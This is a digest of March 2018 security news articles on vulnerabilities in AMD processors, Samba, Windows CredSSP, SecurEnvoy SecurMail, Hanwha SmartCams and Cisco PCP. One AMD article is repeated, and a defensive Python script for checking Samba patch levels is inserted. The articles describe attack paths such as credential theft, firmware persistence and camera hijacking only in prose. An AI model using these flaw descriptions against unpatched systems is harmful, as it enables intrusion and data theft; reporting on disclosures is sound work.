The flaws could be potentially exploited to steal sensitive data, install malicious code on AMD-based systems, and gain full access to the compromised systems. The flaws expose servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors to attacks.

CTS-Labs promptly reported the flaws to AMD, Microsoft and “a small number of companies that could produce patches and mitigations.”

“We have just received a report from a company called CTS Labs claiming there are potential security vulnerabilities related to certain of our processors. We are actively investigating and analyzing its findings.” reads a statement published by AMD.

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings. At AMD, security is a top priority and we are continually working to ensure the safety of our users as potential new risks arise.”

This analysis conducted by the experts revealed four classes (RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY) of vulnerabilities affecting the AMD Zen architecture processors and chipsets that usually contain sensitive information such as passwords and encryption keys.

The flaws could allow attackers to bypass AMD’s Secure Encrypted Virtualization (SEV) technology and also Microsoft Windows Credential Guard.

“The AMD Secure Processor, the gatekeeper responsible for the security of AMD processors, contains critical vulnerabilities. This integral part of most of AMD’s products, including workstations and servers, is currently being shipped with multiple security vulnerabilities that could allow malicious actors (“attackers”) to permanently install malicious code inside the Secure Processor itself.” reads the report published by the experts.

“These vulnerabilities could expose AMD customers to industrial espionage that is virtually undetectable by most security solutions”

The researchers also discovered two exploitable manufacturer backdoors inside the Ryzen chipset that could be exploited to inject malicious code into the chip.

The total number of products confirmed affected (successfully exploited) is 21, but the researchers believe that 11 more products are also vulnerable.

Dan Guido, the founder of security firm Trail of Bits, who was informed of the flaws before their public disclosure, confirmed the existence of all 13 AMD vulnerabilities.

Dan Guido (@dguido) wrote on Twitter on March 13, 2018:

“So this http://AMDflaws.com business... CTS Labs asked us to review their research last week, and sent us a full technical report with PoC exploit code for each set of bugs.”

“Regardless of the hype around the release, the bugs are real, accurately described in their technical report (which is not public afaik), and their exploit code works.”

The vulnerabilities enable attackers to bypass security measures like Microsoft’s latest Credential Guard technology or EPYC Secure Processor’s Secure Encrypted Virtualization security feature.

Let’s see in detail the vulnerabilities:

Chimera is a flaw in Ryzen workstation and Ryzen Pro; it consists of two sets of manufacturer backdoor flaws that allow malicious code to be injected into the Ryzen chipsets. Exploitation of the Chimera issues could allow attackers to install malware that leverages the Direct Memory Access engine to attack the operating system.
“Chipset-based malware could evade virtually all endpoint security solutions on the market.” reads the analysis.

“Malware running on the chipset could leverage the latter’s Direct Memory Access (DMA) engine to attack the operating system. This kind of attack has been demonstrated.”

Ryzenfall impacts AMD’s Ryzen workstation, Pro and mobile lineups; it could allow attackers to inject malicious code to take complete control over the AMD Secure Processor and leverage the technology’s privileges to read and write protected memory areas (including SMRAM and the Windows Credential Guard isolated memory).
“Attackers could use RYZENFALL to bypass Windows Credential Guard, steal network credentials, and then potentially spread through even highly secure Windows corporate networks.” continues the analysis.

“Attackers could use RYZENFALL in conjunction with MASTERKEY to install persistent malware on the Secure Processor, exposing customers to the risk of covert and long-term industrial espionage.”

Fallout vulnerabilities impact AMD’s EPYC server chips and could be exploited to read from and write to protected memory areas including SMRAM and Windows Credential Guard isolated memory (VTL-1).
“An attacker could leverage these vulnerabilities to bypass BIOS flashing protections that are implemented in SMM.”

The Masterkey flaw breaks down into three separate vulnerabilities in AMD’s Secure Processor firmware; they can be exploited to infiltrate the Secure Processor in EPYC server, Ryzen workstation, Ryzen Pro and Ryzen mobile chips.
“The flaw facilitates network credential theft by allowing Windows Credential Guard to be bypassed.” states the report. “Physical damage and bricking of hardware. Could be used by attackers in hardware-based “ransomware” scenarios.”

Many of the flaws are firmware vulnerabilities and could take a long time to address, while the Chimera hardware vulnerabilities cannot be fixed.

It is still unclear if the flaws are currently being exploited in the wild.


Samba fixed two critical vulnerabilities, update your version as soon as possible
14.3.2018 securityaffairs 
Vulnerebility

Maintainers at the Samba project have released new versions of the popular networking software to fix two critical vulnerabilities.
Maintainers at the Samba project have released new versions of the popular open-source networking software to address two critical vulnerabilities that could be exploited by unprivileged remote attackers to launch DoS attacks against servers and to change any user’s password, including those of administrators.

Samba provides secure and fast file and print services for all clients using the SMB/CIFS protocol; it allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network folders, files, and printers with Windows systems.

The maintainers of Samba have addressed the vulnerabilities with the release of the Samba versions 4.7.6, 4.6.14, 4.5.16.

The first DoS vulnerability tracked as CVE-2018-1050 could be exploited “when the RPC spoolss service is configured to be run as an external daemon.”

The vulnerability is caused by missing input sanitization checks on some parameters and affects all versions of Samba from 4.0.0 onwards.

“Missing input sanitization checks on some of the input parameters to spoolss RPC calls could cause the print spooler service to crash. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection.” reads the security advisory.

A second flaw, tracked as CVE-2018-1057, could be exploited by unprivileged authenticated users to change any other user’s password, including admin users, over LDAP. Samba doesn’t properly validate the permissions of users when they request to modify passwords over LDAP.

The flaw only affects the Samba Active Directory DC; all versions of Samba’s AD DC, including pre-release versions since Samba 4.0.0alpha13, are affected by this vulnerability.

Administrators need to update vulnerable servers immediately; further details have been published on the “Samba Security Releases” page.
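A version-triage helper for the fixed releases named above, added here as an example (it is not code from the Samba project): it parses the kind of string `smbd --version` prints (the sample strings in the test are constructed), compares the version against the per-branch fixed releases 4.7.6, 4.6.14 and 4.5.16, and lists which of the two CVEs still applies given the server's role, since CVE-2018-1057 only concerns an AD DC. Treating branches newer than 4.7 as carrying the fix is an assumption, not something the advisory text above states.

```python
import re

# Fixed releases named in the Samba advisory (CVE-2018-1050 and CVE-2018-1057),
# keyed by (major, minor) branch.
FIXED_BY_BRANCH = {
    (4, 7): (4, 7, 6),
    (4, 6): (4, 6, 14),
    (4, 5): (4, 5, 16),
}
FIRST_AFFECTED = (4, 0, 0)  # "all versions of Samba from 4.0.0 onwards"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract (major, minor, patch) from strings such as 'Version 4.6.12-Ubuntu'
    or '4.7.6'. Pre-release suffixes ('4.0.0alpha13') are ignored, which is the
    conservative choice here because the advisory counts them as affected.
    Returns None when no dotted version is present."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(g) for g in m.groups())


def assess(version_text, role="file-server"):
    """Classify a Samba version against the March 2018 fixes.

    Returns (status, applicable_cves) where status is one of
    'not-affected', 'patched', 'vulnerable', 'vulnerable-eol' or 'unknown'
    and role is 'file-server' or 'ad-dc'.
    """
    v = parse_version(version_text)
    if v is None:
        return "unknown", []
    if v < FIRST_AFFECTED:
        return "not-affected", []

    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        status = "patched" if v >= FIXED_BY_BRANCH[branch] else "vulnerable"
    elif branch > max(FIXED_BY_BRANCH):
        # Assumption (not from the advisory): branches newer than 4.7 were cut
        # after the fix landed and therefore carry it.
        status = "patched"
    else:
        # 4.0 through 4.4: inside the affected range, but no fixed release was
        # issued for these branches, so an upgrade to a supported branch is needed.
        status = "vulnerable-eol"

    cves = []
    if status in ("vulnerable", "vulnerable-eol"):
        cves.append("CVE-2018-1050")  # spoolss DoS, relevant to every role
        if role == "ad-dc":
            cves.append("CVE-2018-1057")  # LDAP password change, AD DC only
    return status, cves


if __name__ == "__main__":
    # Constructed sample inputs shaped like `smbd --version` output.
    for sample, role in [("Version 4.6.12-Ubuntu", "ad-dc"),
                         ("Version 4.7.6", "file-server"),
                         ("Version 4.4.16-Debian", "file-server")]:
        print(sample, role, "->", assess(sample, role))
```

Run it on the output of `smbd --version` collected from each server (and pass `role="ad-dc"` for domain controllers) to get a quick list of hosts that still need the update.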


A critical flaw in Credential Security Support Provider protocol (CredSSP) affects all versions of Windows
14.3.2018 securityaffairs 
Vulnerebility

Security experts at the firm Preempt Security discovered a critical vulnerability in the Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows to date.
The flaw, tracked as CVE-2018-0886, could be used by a remote attacker to exploit RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) to steal data and run malicious code.

The vulnerability is a logical cryptographic issue in CredSSP that can be exploited by an attacker in a man-in-the-middle position to steal session authentication data and perform a Remote Procedure Call attack.

An attacker with WiFi/Physical access to your network could easily launch a man-in-the-middle attack.

The CredSSP protocol enables an application to securely delegate a user’s credentials from a client to a target server, it works with both RDP and WinRM.

When a client and server authenticate over RDP and WinRM, a man-in-the-middle attacker can execute remote commands on the target system. The attacker waits for a CredSSP session to occur, then steals the session authentication and performs a Remote Procedure Call (DCE/RPC) attack on the server that the user originally connected to.

“An attacker who has stolen a session from a user with sufficient privileges could run different commands with local admin privileges. This is especially critical in the case of domain controllers, where most Remote Procedure Calls (DCE/RPC) are enabled by default,” explained Yaron Zinar, security expert at Preempt.

“This could leave enterprises vulnerable to a variety of threats from attackers including lateral movement and infection on critical servers or domain controllers.”

Researchers discovered the flaw in August 2017 and reported it to Microsoft, which fixed the issue today as part of the March 2018 Patch Tuesday.

Users need to patch their installations by applying the security updates issued by Microsoft.

Preempt researchers pointed out that patching alone is necessary but not sufficient to prevent exploitation of the flaw: admins also need to make a configuration change for the patch to take effect and to be secure.

“However, it is important to note that patching alone is not enough as you will also need to make a configuration change to apply the patch and be protected. For further details on how to apply the patch refer to Microsoft advisory.” continues the security advisory.

“As with many previous exploits, blocking the relevant application ports/services (RDP, DCE/RPC) would also thwart the attack. It is recommended to apply the proper network segmentation policy and block unnecessary ports/services.”

Another best practice is to reduce the use of privileged accounts as much as possible in favor of non-privileged accounts wherever that is feasible.


13 Critical Flaws Discovered in AMD Ryzen and EPYC Processors
13.3.2018 thehackernews
Vulnerebility

Security researchers have discovered 13 critical Spectre/Meltdown-like vulnerabilities throughout AMD's Ryzen and EPYC lines of processors that could allow attackers to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
All these vulnerabilities lie in the secure part of AMD's Zen architecture processors and chipsets—typically where the device stores sensitive information such as passwords and encryption keys and makes sure nothing malicious is running when you start your PC.
The unpatched vulnerabilities are categorized into four classes—RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY—and threaten a wide range of servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors.

Discovered by the team of researchers at Israel-based CTS-Labs, newly disclosed vulnerabilities defeat AMD's Secure Encrypted Virtualization (SEV) technology and could allow attackers to bypass Microsoft Windows Credential Guard to steal network credentials.
Moreover, researchers also found two exploitable manufacturer backdoors inside the Ryzen chipset that could allow attackers to inject malicious code inside the chip.

AMD's Ryzen chipsets are found in desktop and laptop computers, while EPYC processors are found in servers. Researchers successfully tested the vulnerabilities in 21 different products and believe 11 more products are also vulnerable to the issues.
Here's the brief explanation of all the vulnerabilities:
RYZENFALL (v1, v2, v3, v4) AMD Vulnerabilities
These flaws reside in AMD Secure OS and affect Ryzen secure processors (workstation/pro/mobile).

According to researchers, RYZENFALL vulnerabilities allow unauthorized code execution on the Ryzen Secure Processor, eventually letting attackers access protected memory regions, inject malware into the processor itself, and disable SMM protections against unauthorized BIOS reflashing.
Attackers could also use RYZENFALL to bypass Windows Credential Guard and steal network credentials, and then use the stolen data to spread across to other computers within that network (even highly secure Windows corporate networks).
RYZENFALL can also be combined with another issue called MASTERKEY (detailed below) to install persistent malware on the Secure Processor, "exposing customers to the risk of covert and long-term industrial espionage."
FALLOUT (v1, v2, v3) AMD Vulnerabilities
These vulnerabilities reside in the bootloader component of EPYC secure processor and allow attackers to read from and write to protected memory areas, such as SMRAM and Windows Credential Guard isolated memory.
FALLOUT attacks only affect servers using AMD's EPYC secure processors and could be exploited to inject persistent malware into VTL1, where the Secure Kernel and Isolated User Mode (IUM) execute code.


Like RYZENFALL, FALLOUT also lets attackers bypass BIOS flashing protections and steal network credentials protected by Windows Credential Guard.
"EPYC servers are in the process of being integrated into data centers around the world, including at Baidu and Microsoft Azure Cloud, and AMD has recently announced that EPYC and Ryzen embedded processors are being sold as high-security solutions for mission-critical aerospace and defense systems," researchers say.
"We urge the security community to study the security of these devices in depth before allowing them on mission-critical systems that could potentially put lives at risk."
CHIMERA (v1, v2) AMD Vulnerabilities
These two vulnerabilities are actually hidden manufacturer backdoors inside AMD's Promontory chipsets that are an integral part of all Ryzen and Ryzen Pro workstations.

One backdoor has been implemented in firmware running on the chip, the other in the chip's hardware (ASIC); both allow attackers to run arbitrary code inside the AMD Ryzen chipset or to re-flash the chip with persistent malware.
Since WiFi, network and Bluetooth traffic flows through the chipset, an attacker could exploit the chipset's man-in-the-middle position to launch sophisticated attacks against your device.
"This, in turn, could allow for firmware-based malware that has full control over the system, yet is notoriously difficult to detect or remove. Such malware could manipulate the operating system through Direct Memory Access (DMA), while remaining resilient against most endpoint security products," researchers say.
According to the researchers, it may be possible to implement a stealthy keylogger by listening to USB traffic that flows through the chipset, allowing attackers to see everything a victim types on the infected computer.
"Because the latter has been manufactured into the chip, a direct fix may not be possible, and the solution may involve either a workaround or a recall," researchers warn.
MASTERKEY (v1, v2, v3) AMD Vulnerabilities
These three vulnerabilities in EPYC and Ryzen (workstation/pro/mobile) processors could allow attackers to bypass hardware validated boot to re-flash BIOS with a malicious update and infiltrate the Secure Processor to achieve arbitrary code execution.
Like RYZENFALL and FALLOUT, MASTERKEY also allows attackers to install stealthy and persistent malware inside AMD Secure Processor, "running in kernel-mode with the highest possible permissions," as well as bypass Windows Credential Guard to facilitate network credential theft.
MASTERKEY vulnerabilities also allow attackers to disable security features such as Firmware Trusted Platform Module (fTPM) and Secure Encrypted Virtualization (SEV).
CTS-Lab researchers gave the AMD team just 24 hours to look at all the vulnerabilities and respond before going public with their details—that's extremely quick for any company to understand and properly patch critical issues.

While Intel and Microsoft are still managing their patches for the Meltdown and Spectre vulnerabilities, the newly discovered vulnerabilities could create similar trouble for AMD and its customers.
So, let's wait and watch when the company comes up with fixes, though the researchers said it could take "several months to fix" all the issues.
For more detailed information about the vulnerabilities, you can head on to this paper [PDF] titled, "Severe Security Advisory on AMD Processors," published by CTS-Lab.


13 Critical Flaws Discovered in AMD Ryzen and EPYC Processors
13.3.2018 thehackernews
Vulnerebility

Security researchers have discovered 13 critical Spectre/Meltdown-like vulnerabilities throughout AMD's Ryzen and EPYC lines of processors that could allow attackers to access sensitive data, install persistent malware inside the chip, and gain full access to the compromised systems.
All these vulnerabilities lie in the secure part of the AMD's Zen architecture processors and chipsets—typically where device stores sensitive information such as passwords and encryption keys and makes sure nothing malicious is running when you start your PC.
The unpatched vulnerabilities are categorized into four classes—RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY—and threaten wide-range of servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors.

Discovered by the team of researchers at Israel-based CTS-Labs, newly disclosed vulnerabilities defeat AMD's Secure Encrypted Virtualization (SEV) technology and could allow attackers to bypass Microsoft Windows Credential Guard to steal network credentials.
Moreover, researchers also found two exploitable manufacturer backdoors inside Ryzen chipset that could allow attackers to inject malicious code inside the chip.

AMD's Ryzen chipsets are found in desktop and laptop computers, while EPYC processors in servers. Researchers successfully tested the vulnerabilities in 21 different products and believed 11 more products are also vulnerable to the issues.
Here's the brief explanation of all the vulnerabilities:
RYZENFALL (v1, v2, v3, v4) AMD Vulnerabilities
These flaws reside in AMD Secure OS and affect Ryzen secure processors (workstation/pro/mobile).

According to researchers, RYZENFALL vulnerabilities allow unauthorized code execution on the Ryzen Secure Processor, eventually letting attackers access protected memory regions, inject malware into the processor itself, and disable SMM protections against unauthorized BIOS reflashing.
Attackers could also use RYZENFALL to bypass Windows Credential Guard and steal network credentials, and then use the stolen data to spread across to other computers within that network (even highly secure Windows corporate networks).
RYZENFALL can also be combined with another issue called MASTERKEY (detailed below) to install persistent malware on the Secure Processor, "exposing customers to the risk of covert and long-term industrial espionage."
FALLOUT (v1, v2, v3) AMD Vulnerabilities
These vulnerabilities reside in the bootloader component of the EPYC secure processor and allow attackers to read from and write to protected memory areas, such as SMRAM and the isolated memory used by Windows Credential Guard.
FALLOUT attacks only affect servers using AMD's EPYC secure processors and could be exploited to inject persistent malware into VTL1, where the Secure Kernel and Isolated User Mode (IUM) execute code.


Like RYZENFALL, FALLOUT also lets attackers bypass BIOS flashing protections and steal network credentials protected by Windows Credential Guard.
"EPYC servers are in the process of being integrated into data centers around the world, including at Baidu and Microsoft Azure Cloud, and AMD has recently announced that EPYC and Ryzen embedded processors are being sold as high-security solutions for mission-critical aerospace and defense systems," researchers say.
"We urge the security community to study the security of these devices in depth before allowing them on mission-critical systems that could potentially put lives at risk."
CHIMERA (v1, v2) AMD Vulnerabilities
These two vulnerabilities are actually hidden manufacturer backdoors inside AMD's Promontory chipsets that are an integral part of all Ryzen and Ryzen Pro workstations.

One backdoor has been implemented in the firmware running on the chip, the other in the chip's hardware (ASIC); both allow attackers to run arbitrary code inside the AMD Ryzen chipset, or to re-flash the chip with persistent malware.
Since WiFi, network and Bluetooth traffic flows through the chipset, an attacker could exploit the chipset's man-in-the-middle position to launch sophisticated attacks against your device.
"This, in turn, could allow for firmware-based malware that has full control over the system, yet is notoriously difficult to detect or remove. Such malware could manipulate the operating system through Direct Memory Access (DMA), while remaining resilient against most endpoint security products," researchers say.
According to the researchers, it may be possible to implement a stealthy keylogger by listening to USB traffic that flows through the chipset, allowing attackers to see everything a victim types on the infected computer.
"Because the latter has been manufactured into the chip, a direct fix may not be possible, and the solution may involve either a workaround or a recall," researchers warn.
MASTERKEY (v1, v2, v3) AMD Vulnerabilities
These three vulnerabilities in EPYC and Ryzen (workstation/pro/mobile) processors could allow attackers to bypass hardware validated boot to re-flash BIOS with a malicious update and infiltrate the Secure Processor to achieve arbitrary code execution.
Like RYZENFALL and FALLOUT, MASTERKEY also allows attackers to install stealthy and persistent malware inside AMD Secure Processor, "running in kernel-mode with the highest possible permissions," as well as bypass Windows Credential Guard to facilitate network credential theft.
MASTERKEY vulnerabilities also allow attackers to disable security features such as Firmware Trusted Platform Module (fTPM) and Secure Encrypted Virtualization (SEV).
CTS-Lab researchers gave the AMD team just 24 hours to look at all the vulnerabilities and respond before going public with the details, which is very little time for any company to understand and properly patch critical issues.

While Intel and Microsoft are still managing their patches for the Meltdown and Spectre vulnerabilities, the newly discovered vulnerabilities could create similar trouble for AMD and its customers.
So, let's wait and watch when the company comes up with fixes, though the researchers said it could take "several months to fix" all the issues.
For more detailed information about the vulnerabilities, you can head on to this paper [PDF] titled, "Severe Security Advisory on AMD Processors," published by CTS-Lab.


Critical Vulnerabilities Addressed in SecurEnvoy SecurMail
13.3.2018 securityweek 
Vulnerebility

Multiple critical vulnerabilities impacting SecurEnvoy SecurMail could result in an attacker being able to read encrypted emails and even delete or overwrite messages in an inbox.

SecurEnvoy SecurMail was meant to provide businesses with secure email communications and claims to be offering organizations the full advantages of encryption without the hassle of deployment or management operations.

This week, SEC Consult revealed information on seven critical vulnerabilities in the product that “break the core security promises of the product,” as they can expose sensitive information to attackers.

The flaws were discovered during a short testing period in November 2017, SEC Consult reveals in an advisory. The discovered vulnerabilities were recently addressed with the release of SecurMail 9.2.501, or hotfix patch “1_012018.”

“As other SecureEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits,” SEC Consult notes.

The discovered vulnerabilities include two Cross Site Scripting flaws (CVE-2018-7703, CVE-2018-7707), caused by the application failing to encode user input when building HTML pages.

The security firm also found that the application performs no path traversal checks (CVE-2018-7705, CVE-2018-7706), and that authorization checks are only partially implemented, resulting in an Insecure Direct Object Reference (CVE-2018-7704) vulnerability. These flaws could allow a legitimate recipient to read, in plain text, mails sent to other recipients.

The application was also plagued with a Missing Authentication and Authorization (CVE-2018-7702) flaw, where no authentication was required on the SecurEnvoy server for a client to send emails. This could allow anyone with network access to the server to arbitrarily send emails spoofing other sender addresses.

The issue could also be exploited by attackers with network access to the server to resend previous communication to arbitrary recipients. Thus, they could extract all emails stored on the server and could also modify arbitrary messages.

SecurEnvoy SecurMail was also impacted by a Cross Site Request Forgery (CVE-2018-7701) vulnerability, as the web interface had no protection against such attacks. Thus, an attacker could delete a victim's email or impersonate the victim and reply to their emails. Attacks are also possible against the API used to send emails, which does not require authentication on the server.

“Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As already several core security promises have been broken during this short crash test, no further tests were conducted,” SEC Consult notes.

The vulnerabilities were found in SecurEnvoy SecurMail version 9.1.501 and were addressed with security patch “1_012018.” Version 9.2.501 of the software is no longer vulnerable.

In their advisory, SEC Consult also published proof-of-concept code for the discovered vulnerabilities.


Update Samba Servers Immediately to Patch Password Reset and DoS Vulnerabilities
13.3.2018 thehackernews
Vulnerebility
Samba maintainers have just released new versions of their networking software to patch two critical vulnerabilities that could allow unprivileged remote attackers to launch DoS attacks against servers and change any other users' passwords, including admin's.
Samba is open-source software (a re-implementation of the SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share folders, files and printers with Windows systems.
The denial of service vulnerability, assigned CVE-2018-1050, affects all versions of Samba from 4.0.0 onwards and could be exploited "when the RPC spoolss service is configured to be run as an external daemon."
"Missing input sanitization checks on some of the input parameters to spoolss RPC calls could cause the print spooler service to crash. If the RPC spoolss service is left by default as an internal service, all a client can do is crash its own authenticated connection," the Samba advisory says.
The second vulnerability, assigned CVE-2018-1057, allows unprivileged authenticated users to change any other users' passwords, including admin users, over LDAP.
The password reset flaw exists in all versions of Samba from 4.0.0 onwards, but only affects the Samba Active Directory DC implementation, which doesn't properly validate users' permissions when they request a password change over LDAP.


A large number of servers might potentially be at risk, because Samba ships with a wide range of Linux distributions.
The maintainers of Samba have addressed both vulnerabilities with the release of new Samba versions 4.7.6, 4.6.14, 4.5.16 and have advised administrators to update vulnerable servers immediately.
If you are running an older version of Samba, check this page for contributed patches, if available.


13 Vulnerabilities in Hanwha SmartCams Demonstrate Risks of Feature Complexity
13.3.2018 securityaffairs
Vulnerebility

The researchers at Kaspersky Lab ICS CERT decided to check the popular Hanwha SmartCams and discovered 13 vulnerabilities.
Wikipedia describes the attack surface as “[the] sum of the different points (the “attack vectors”) where an unauthorized user (the “attacker”) can try to enter data to or extract data from an environment.”

Basically, the more points there are to compromise a system, the more likely the system will be compromised. In the Internet of Things (IoT) development, the potentially vulnerable points correlate to features — and the Hanwha SNH-V6410PN/PNW SmartCam has a lot of them.

A few of the features listed on the manufacturer’s website: remote control from your smartphone via wifi, two-way communication via built-in microphone, record video or still images to your smart device, event notification.

All of these present a potential point of vulnerability to be exploited. In the case of this Samsung-branded SmartCam, it looks like all of them are vulnerable, as Kaspersky's researchers documented 13 separate vulnerabilities:

Use of insecure HTTP protocol during firmware update
Use of insecure HTTP protocol during camera interaction via HTTP API
An undocumented (hidden) capability for switching the web interface using the file ‘dnpqtjqltm’
Buffer overflow in file ‘dnpqtjqltm’ for switching the web interface
A feature for the remote execution of commands with root privileges
A capability to remotely change the administrator password
Denial of service for SmartCam
No protection from brute force attacks for the camera’s admin account password
A weak password policy when registering the camera on the server samsungsmartcam.com. Attacks against users of SmartCam applications are possible
Communication with other cameras is possible via the cloud server
Blocking of new camera registration on the cloud server
Authentication bypass on SmartCam. Change of administrator password and remote execution of commands.
Restoration of camera password for the SmartCam cloud account
This looks like a lot of vulnerabilities, but it is not surprising when you have an IoT device that offers a wide range of features like the SmartCam. Combining hardware that acts as a web server with a cloud server, streaming video and audio, and a supporting mobile application creates a lot of places to make mistakes.

By relying on HTTP instead of encrypted HTTPS, it becomes possible for bad actors to inject their own code into firmware updates as they are downloaded to the cameras, or to control the camera and microphone as they choose when the SmartCam is controlled via the HTTP interface.


The developers also missed some very basic account management security controls. Being able to change admin account passwords remotely could allow an attacker to load their own malicious code onto the camera to send video to the destination of their choosing, lock the legitimate user out of their hardware, make the camera participate in a botnet, or even mine cryptocurrency.

Even if the camera is hidden behind a firewall, the poorly implemented password controls in the cloud service offer a channel for the bad actors to find and control the camera.

There is even an interesting attack vector where the attacker “clones” the individual’s camera such that the victim sees the video feed from the attacker’s camera instead of their own. One can imagine a Hollywood movie scene where a security camera feed is replaced with the view from an empty hallway while the criminals walk through the building with impunity.

These cameras are also subject to the common Denial of Service vulnerabilities often found in IoT devices. There is one unique method that leverages the cloud service in this case. If the bad actor is able to register the camera details first, the legitimate customer will be unable to register and their SmartCam becomes useless.

In a blog post on March 12, Vladimir Dashchenko confirmed that these vulnerabilities exist “not only in the camera being researched but in all smart cameras manufactured by Hanwha Techwin. The latter also makes firmware for Samsung cameras.”

Following notification from the researcher, Hanwha has started to release firmware updates to fix the vulnerabilities, but this work continues. Details about the fixed vulnerabilities are available from the following CVEs: CVE-2018-6294, CVE-2018-6295, CVE-2018-6296, CVE-2018-6297, CVE-2018-6298, CVE-2018-6299, CVE-2018-6300, CVE-2018-6301, CVE-2018-6302, CVE-2018-6303.

It is tempting to purchase the solution with the most features for the lowest price because it feels like the best deal. However, getting to the lowest price usually requires compromises and are you getting a deal if the compromises come in features you don’t need?


Cisco Patches Hard-coded Password in PCP Software
12.3.2018 securityweek
Vulnerebility

Cisco this week announced the availability of software updates to address a hard-coded password vulnerability in Cisco Prime Collaboration Provisioning (PCP) Software.

Due to the existence of the hard-coded account password, an unauthenticated, local attacker could log into the underlying Linux operating system. The vulnerability can be abused to connect to the affected system via Secure Shell (SSH) using the hard-coded credentials.

According to Cisco, an attacker successfully exploiting the vulnerability could access the underlying operating system as a low-privileged user. However, the attacker could elevate privileges to root and take full control of the vulnerable system.

Because of the privilege escalation possibility, the vulnerability has a Security Impact Rating (SIR) of Critical, although it was also assessed with a Common Vulnerability Scoring System (CVSS) Base score of 5.9, which would normally come with a SIR of Medium.

The vulnerability impacts Cisco PCP Software release 11.6 only and no prior builds were found to be affected by it, Cisco notes in an advisory. Impacted customers should update to Cisco PCP releases 12.1 and later, as no workarounds that address this vulnerability exist.

The company also notes that it is not aware of “any public announcements or malicious use of the vulnerability.”

This week, the company also addressed CVE-2018-0147, a Critical (CVSS base score of 9.8) vulnerability in Java deserialization used by Cisco Secure Access Control System (ACS), which could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device.

“The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object. An exploit could allow the attacker to execute arbitrary commands on the device with root privileges,” Cisco explains.

The company also addressed a High risk (CVSS base score of 7.3) bug in the FTP server of the Cisco Web Security Appliance (WSA). Due to incorrect FTP user credential validation, an unauthenticated, remote attacker could exploit the bug to log into the server without a valid password or username.

This security issue affects Cisco AsyncOS for WSA Software running any release of Cisco AsyncOS 10.5.1 for WSA Software. Cisco AsyncOS 10.5.2-042 or later releases address the flaw.

Multiple Medium severity bugs were addressed in other Cisco products.


Remotely Exploitable Flaws Found in SmartCam Cameras
12.3.2018 securityweek
Vulnerebility

Hanwha’s SmartCam cameras are affected by more than a dozen vulnerabilities, including critical flaws that can be exploited remotely to take control of devices.

The impacted cameras are widely used for surveillance and monitoring. They can record at high resolutions, they have night vision capabilities and motion sensors, and they allow their users to talk to the person being monitored via a built-in speaker. The product can be controlled remotely from any type of device and all the recorded video is stored in the cloud.

Samsung Electronics sold its Samsung Techwin security division to South Korean conglomerate Hanwha Group in 2014. However, Hanwha’s SmartCam products are still branded “Samsung.”

Researchers have analyzed these devices and discovered a significant number of flaws. The issues were disclosed last week by Vladimir Dashchenko, senior security researcher at Kaspersky Lab, at the company’s Security Analyst Summit (SAS) in Cancun. The security firm also published a blog post on Monday describing the findings.

The vulnerabilities can be exploited for intercepting traffic due to the use of HTTP for firmware updates and interaction with the camera, manipulating the web-based user interface, remote code execution with root privileges, denial-of-service (DoS) attacks, brute-force attacks on the admin account, and bypassing authentication.

Experts have identified roughly 2,000 IP addresses associated with cameras exposed to the Internet, but they believe the actual number of vulnerable devices is much higher considering that the flaws can be exploited even against devices that are not directly accessible from the Web due to weaknesses in the SmartCam cloud infrastructure.

Vulnerabilities found in Hanwha SmartCam cameras

One of the flaws found by Kaspersky can be exploited to register cameras that have yet to be registered. This not only prevents legitimate owners from registering and using their cameras, but also allows hackers to take control of the cameras they have registered.

Due to vulnerabilities in the cloud infrastructure, an attacker could have spoofed the update server in an effort to push malicious firmware to a device. Modified firmware can provide privileged access to the targeted camera, serving as an entry point to the rest of the network housing the device, experts say.

Researchers also discovered that a hacker can easily clone a camera in an effort to spoof its video feed.

“The attacker then resets the password using a vulnerability in the password generation algorithm and modifies the firmware of the cloned camera (which is an identical camera located on the attacker’s side). The victim’s camera is then remotely disabled. As a result, the victim will receive a video signal from the attacker’s cloned camera,” Kaspersky researchers explained.

The setup process for the cameras also involves providing credentials for social media and other online services for sending notifications to the user, which can be abused by cybercriminals for phishing and spam campaigns.

Dashchenko told SecurityWeek that remote attacks against these cameras are a multi-stage process that starts with identifying the targeted device’s serial number and MAC address. The serial number can be obtained by either guessing or brute-forcing it.

Large-scale attacks are also possible with the use of scripts and automation mechanisms, Dashchenko said.

Kaspersky’s ICS-CERT team has conducted its research on Hanwha SNH-V6410PN/PNW SmartCam devices, but the same firmware is used for multiple camera models — different features in the firmware are active depending on the model — which means many of the company’s products are likely affected by these vulnerabilities.

The vendor patched many of the vulnerabilities shortly after being notified and Kaspersky has only disclosed the details of the flaws that have been fixed.


Somebody’s watching! When cameras are more than just ‘smart’
12.3.2018 Kaspersky 
Vulnerebility
Every year the number of smart devices grows. Coffee machines, bracelets, fridges, cars and loads of other useful gadgets have now gone smart. We are now seeing the emergence of smart streets, roads and even cities.

Devices such as smart cameras have long been part of everyday life for many, as communication devices, components in security and video surveillance systems, to keep an eye on pets, etc.

The latest smart cameras can connect to the cloud. This is done so that a user can watch what’s happening at a remote location using a variety of devices.

